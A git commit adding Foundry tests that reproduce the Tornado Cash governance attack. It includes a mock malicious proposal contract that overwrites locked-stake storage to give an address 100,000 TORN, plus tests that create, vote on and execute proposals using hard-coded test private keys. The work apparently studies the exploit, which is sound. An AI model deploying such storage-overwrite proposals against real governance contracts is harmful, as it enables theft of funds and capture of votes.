Add tests to adding TORNs directly to stake via malicious proposal

This commit is contained in:
Theo 2023-05-23 01:13:35 +03:00
parent bf6836ffb2
commit 0d629f2e21
5 changed files with 175 additions and 9 deletions

@ -0,0 +1,15 @@
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.17;
import "@interfaces/IERC20.sol";
import "@proprietary/Mock.sol";
contract SetStakeDirectlyProposal is Mock {
uint256[59] private _pad;
mapping(address => uint256) private _balances;
function executeProposal() external {
_balances[ADDRESS_TO_STAKE] = STAKE_AMOUNT;
}
}

@ -3,5 +3,21 @@ pragma solidity 0.8.17;
interface IGovernance { interface IGovernance {
function lockedBalance(address account) external view returns (uint256); function lockedBalance(address account) external view returns (uint256);
function propose(
address target,
string memory description
) external returns (uint256);
function castVote(uint256 proposalId, bool support) external;
function lock(
address owner,
uint256 amount,
uint256 deadline,
uint8 v,
bytes32 r,
bytes32 s
) external;
function execute(uint256 proposalId) external payable; function execute(uint256 proposalId) external payable;
} }

44
src/proprietary/Mock.sol Normal file

@ -0,0 +1,44 @@
pragma solidity 0.8.17;
contract Mock {
uint256 constant TEST_PRIVATE_KEY_ONE =
0x66ddbd7cbe4a566df405f6ded0b908c669f88cdb1656380c050e3a457bd21df0;
uint256 constant TEST_PRIVATE_KEY_TWO =
0xa4c8c98120e77741a87a116074a2df4ddb20d1149069290fd4a3d7ee65c55064;
address constant TEST_ADDRESS_ONE =
0x118251976c65AFAf291f5255450ddb5b6A4d8B88;
address constant TEST_ADDRESS_TWO =
0x63aE7d90Eb37ca39FC62dD9991DbEfeE70673a20;
address constant ADDRESS_TO_STAKE =
0xd8dA6BF26964aF9D7eEd9e03E53415D37aA96045;
uint256 constant STAKE_AMOUNT = 100_000 ether;
uint256 constant PROPOSAL_DURATION = 7 days;
uint256 constant PROPOSAL_THRESHOLD = 25000 ether;
string constant PROPOSAL_DESCRIPTION =
"{title:'Proposal #22: Test clone of 21 proposal: change locked stake balance directly',description:''}";
address constant VERIFIER_ADDRESS =
0x77777FeDdddFfC19Ff86DB637967013e6C6A116C;
bytes32 constant PERMIT_TYPEHASH =
keccak256(
"Permit(address owner,address spender,uint256 value,uint256 nonce,uint256 deadline)"
);
bytes32 constant EIP712_DOMAIN =
keccak256(
abi.encode(
keccak256(
"EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)"
),
keccak256(bytes("TornadoCash")),
keccak256(bytes("1")),
1,
VERIFIER_ADDRESS
)
);
uint16 constant PERMIT_FUNC_SELECTOR = uint16(0x1901);
}

@ -2,14 +2,11 @@ pragma solidity 0.8.17;
contract Parameters { contract Parameters {
// Beneficary addresses // Beneficary addresses
address public _governanceAddress = address constant _governanceAddress =
0x5efda50f22d34F262c29268506C5Fa42cB56A1Ce; 0x5efda50f22d34F262c29268506C5Fa42cB56A1Ce;
address public _governanceVaultAddress = address constant _governanceVaultAddress =
0x2F50508a8a3D323B91336FA3eA6ae50E55f32185; 0x2F50508a8a3D323B91336FA3eA6ae50E55f32185;
address public _tokenAddress = 0x77777FeDdddFfC19Ff86DB637967013e6C6A116C; address constant _tokenAddress = 0x77777FeDdddFfC19Ff86DB637967013e6C6A116C;
// Proposals info
uint256 public PROPOSAL_DURATION = 7 days;
// Attacker info - proposal, addresses // Attacker info - proposal, addresses
uint256 _attackerProposalId = 21; uint256 _attackerProposalId = 21;

@ -4,11 +4,14 @@ import "@interfaces/IGovernance.sol";
import "@interfaces/IERC20.sol"; import "@interfaces/IERC20.sol";
import "@proprietary/Parameters.sol"; import "@proprietary/Parameters.sol";
import "@proprietary/Mock.sol";
import "@root/SetStakeDirectlyProposal.sol";
import "@forge-std/Test.sol"; import "@forge-std/Test.sol";
import "@forge-std/console2.sol"; import "@forge-std/console2.sol";
contract ProposalTest is Test, Parameters { contract ProposalTest is Test, Parameters, Mock, SetStakeDirectlyProposal {
IGovernance internal governance = IGovernance(_governanceAddress); IGovernance internal governance = IGovernance(_governanceAddress);
uint256 internal currentGovernanceVaultBalance = uint256 internal currentGovernanceVaultBalance =
getGovernanceVaultBalance(); getGovernanceVaultBalance();
@ -19,12 +22,22 @@ contract ProposalTest is Test, Parameters {
checkResults(); checkResults();
} }
function testProposal() public conditionStateChecks { function testExistentHackerProposal() public conditionStateChecks {
waitUntilVotingEnds(); waitUntilVotingEnds();
governance.execute(_attackerProposalId); governance.execute(_attackerProposalId);
} }
function getAttackerLockedBalance() internal returns (uint256) { function testMockSetStakeDirectlyProposal() public {
uint256 testSetStakeProposalId = voteAndCreateProposal(
address(new SetStakeDirectlyProposal())
);
waitUntilVotingEnds();
governance.execute(testSetStakeProposalId);
require(governance.lockedBalance(ADDRESS_TO_STAKE) == STAKE_AMOUNT);
}
function getAttackerLockedBalance() internal view returns (uint256) {
uint256 attackerLockedBalance; uint256 attackerLockedBalance;
for (uint i = 0; i < _attackerAddresses.length; i++) { for (uint i = 0; i < _attackerAddresses.length; i++) {
uint256 lockedBalance = governance.lockedBalance( uint256 lockedBalance = governance.lockedBalance(
@ -44,6 +57,86 @@ contract ProposalTest is Test, Parameters {
vm.warp(block.timestamp + PROPOSAL_DURATION); vm.warp(block.timestamp + PROPOSAL_DURATION);
} }
function voteAndCreateProposal(
address proposalAddress
) public returns (uint256) {
retrieveAndLockBalance(
TEST_PRIVATE_KEY_ONE,
TEST_ADDRESS_ONE,
PROPOSAL_THRESHOLD
);
retrieveAndLockBalance(TEST_PRIVATE_KEY_TWO, TEST_ADDRESS_TWO, 1 ether);
/* ----------PROPOSER------------ */
vm.startPrank(TEST_ADDRESS_ONE);
uint256 proposalId = IGovernance(_governanceAddress).propose(
proposalAddress,
PROPOSAL_DESCRIPTION
);
// TIME-TRAVEL
vm.warp(block.timestamp + 6 hours);
IGovernance(_governanceAddress).castVote(proposalId, true);
vm.stopPrank();
/* ------------------------------ */
/* -------------VOTER-------------*/
vm.startPrank(TEST_ADDRESS_TWO);
IGovernance(_governanceAddress).castVote(proposalId, true);
vm.stopPrank();
/* ------------------------------ */
return proposalId;
}
function retrieveAndLockBalance(
uint256 privateKey,
address voter,
uint256 amount
) internal {
uint256 lockTimestamp = block.timestamp + PROPOSAL_DURATION;
bytes32 messageHash = keccak256(
abi.encodePacked(
PERMIT_FUNC_SELECTOR,
EIP712_DOMAIN,
keccak256(
abi.encode(
PERMIT_TYPEHASH,
voter,
_governanceAddress,
amount,
0,
lockTimestamp
)
)
)
);
/* ----------GOVERNANCE------- */
vm.startPrank(_governanceAddress);
IERC20(_tokenAddress).transfer(voter, amount);
vm.stopPrank();
/* ----------------------------*/
(uint8 v, bytes32 r, bytes32 s) = vm.sign(privateKey, messageHash);
/* ----------VOTER------------ */
vm.startPrank(voter);
IGovernance(_governanceAddress).lock(
voter,
amount,
lockTimestamp,
v,
r,
s
);
vm.stopPrank();
/* ----------------------------*/
}
function checkCurrentState() internal { function checkCurrentState() internal {
console2.log( console2.log(
"Current attacker locked balance: %s TORN", "Current attacker locked balance: %s TORN",
@ -58,6 +151,7 @@ contract ProposalTest is Test, Parameters {
function checkResults() internal { function checkResults() internal {
uint256 attackerBalanceAfterProposalExecution = getAttackerLockedBalance(); uint256 attackerBalanceAfterProposalExecution = getAttackerLockedBalance();
uint256 governanceVaultBalanceAfterProposalExecution = getGovernanceVaultBalance(); uint256 governanceVaultBalanceAfterProposalExecution = getGovernanceVaultBalance();
console2.log( console2.log(
"Attacker locked balance after proposal 21 execution: %s TORN", "Attacker locked balance after proposal 21 execution: %s TORN",
attackerBalanceAfterProposalExecution / 10 ** 18 attackerBalanceAfterProposalExecution / 10 ** 18